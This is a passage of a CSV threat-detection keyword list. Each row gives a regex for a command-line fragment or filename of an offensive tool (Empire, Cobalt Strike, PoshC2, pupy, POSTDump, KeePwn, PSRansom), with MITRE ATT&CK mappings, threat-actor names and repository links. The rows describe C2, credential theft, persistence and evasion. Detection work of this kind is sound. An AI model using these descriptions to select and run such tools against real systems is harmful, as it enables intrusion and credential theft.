","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* Persist General *.dll*",".{0,1000}\sPersist\sGeneral\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","241","46","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z" "* Persist Tasksch *.dll*",".{0,1000}\sPersist\sTasksch\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","241","46","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z" "* Persist TreatAs *.dll*",".{0,1000}\sPersist\sTreatAs\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","241","46","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z" "* persist_hkcu_run*",".{0,1000}\spersist_hkcu_run.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* Persistence.sh*",".{0,1000}\sPersistence\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "* -PersistenceScriptName *",".{0,1000}\s\-PersistenceScriptName\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -PersistentScriptFilePath *",".{0,1000}\s\-PersistentScriptFilePath\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* PetitPotato.cpp*",".{0,1000}\sPetitPotato\.cpp.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","10","4","390","51","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z" "* PEzor.sh *",".{0,1000}\sPEzor\.sh\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* PEzor.sh *",".{0,1000}\sPEzor\.sh\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "* -pfx *.pfx -dc-ip *",".{0,1000}\s\-pfx\s.{0,1000}\.pfx\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* pgsql-brute.nse*",".{0,1000}\spgsql\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* PhishCreds.ps1*",".{0,1000}\sPhishCreds\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* -pi \\\\\\\\.\\\\pipe\\\\*",".{0,1000}\s\-pi\s\\\\\\\\\\\\\\\\\.\\\\\\\\pipe\\\\\\\\.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "* Pictures\Screenshots\loot.zip*",".{0,1000}\sPictures\\Screenshots\\loot\.zip.{0,1000}","offensive_tool_keyword","Harvester_OF_SORROW","The payload opens firefox about:logins and tabs and arrows its way through options. It then takes a screen shot with the first set of log in credentials made visible. Finally it sends the screenshot to an email of your choosing.","T1056.001 - T1113 - T1512 - T1566.001 - T1059.006","TA0004 - TA0009 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/blob/master/payloads/library/credentials/Harvester_OF_SORROW/payload.txt","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "* --pid * --disable --privilege SeDebugPrivilege*",".{0,1000}\s\-\-pid\s.{0,1000}\s\-\-disable\s\-\-privilege\sSeDebugPrivilege.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","0","N/A","7","1","11","3","2024-02-18T20:55:05Z","2024-02-17T15:39:25Z" "*----------------------- Pillage Modules -----------------------*",".{0,1000}\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\sPillage\sModules\s\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","#contentstrings","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "* PingSweep.ps1*",".{0,1000}\sPingSweep\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* --pinject *",".{0,1000}\s\-\-pinject\s.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "* -PipeName * -ServiceName * -Command whoami*",".{0,1000}\s\-PipeName\s.{0,1000}\s\-ServiceName\s.{0,1000}\s\-Command\swhoami.{0,1000}","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","0","N/A","9","1","29","9","2024-05-01T13:42:06Z","2023-09-06T16:00:47Z" "* pipename_stager *",".{0,1000}\spipename_stager\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","0","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "* -pipename_stager *",".{0,1000}\s\-pipename_stager\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "* pjl-info-config.nse*",".{0,1000}\spjl\-info\-config\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/nccgroup/nmap-nse-vulnerability-scripts","1","0","N/A","N/A","7","620","61","2022-03-04T09:08:55Z","2021-05-18T15:20:30Z" "* pjl-ready-message.nse*",".{0,1000}\spjl\-ready\-message\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --plugin gmailenum*",".{0,1000}\s\-\-plugin\sgmailenum.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "* --plugin httpbrute*",".{0,1000}\s\-\-plugin\shttpbrute.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "* --plugin KeeFarceRebornPlugin.dll*",".{0,1000}\s\-\-plugin\sKeeFarceRebornPlugin\.dll.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* --plugin KeeFarceRebornPlugin.dll*",".{0,1000}\s\-\-plugin\sKeeFarceRebornPlugin\.dll.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "* --plugin o365enum*",".{0,1000}\s\-\-plugin\so365enum.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "* polenum.py*",".{0,1000}\spolenum\.py.{0,1000}","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "* PoolParty.cpp*",".{0,1000}\sPoolParty\.cpp.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "* PoolParty.exe*",".{0,1000}\sPoolParty\.exe.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","N/A","9","8","776","107","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z" "* pop3-brute.nse*",".{0,1000}\spop3\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* pop3-capabilities.nse*",".{0,1000}\spop3\-capabilities\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* pop3-ntlm-info.nse*",".{0,1000}\spop3\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* popcalc.bin *",".{0,1000}\spopcalc\.bin\s.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","6","519","77","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "* popcalc64.bin *",".{0,1000}\spopcalc64\.bin\s.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","6","519","77","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "* PopUpRansom*",".{0,1000}\sPopUpRansom.{0,1000}","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","0","N/A","N/A","5","440","106","2024-01-19T09:50:26Z","2022-02-27T11:52:03Z" "* --port 1337*",".{0,1000}\s\-\-port\s1337.{0,1000}","offensive_tool_keyword","empire","The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework","T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001","TA0002 - TA0010 - TA0011 ","N/A","N/A","C2","https://github.com/EmpireProject/Empire-GUI","1","0","N/A","10","10","483","144","2022-03-10T11:34:46Z","2018-04-20T21:59:52Z" "* port_reuse.py*",".{0,1000}\sport_reuse\.py.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "* port_scan.py*",".{0,1000}\sport_scan\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* port-states.nse*",".{0,1000}\sport\-states\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* PoshC2 *",".{0,1000}\sPoshC2\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "* -PoshC2Dir *",".{0,1000}\s\-PoshC2Dir\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "* -PoshC2Dir *",".{0,1000}\s\-PoshC2Dir\s.{0,1000}","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and Lateral Movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "* PostDump.exe*",".{0,1000}\sPostDump\.exe.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "* PotentiallyCrackableAccounts.ps1*",".{0,1000}\sPotentiallyCrackableAccounts\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - 